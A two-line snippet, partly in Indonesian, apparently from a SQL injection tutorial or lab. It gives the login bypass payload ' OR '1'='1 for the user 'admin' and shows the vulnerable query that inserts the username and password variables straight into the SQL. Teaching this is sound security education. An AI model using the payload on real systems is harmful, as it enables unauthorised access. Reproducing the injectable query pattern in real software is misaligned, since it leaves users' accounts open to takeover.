Coba username: admin dan password : ' OR '1'='1
SELECT * FROM users WHERE username='$username' AND password='$password'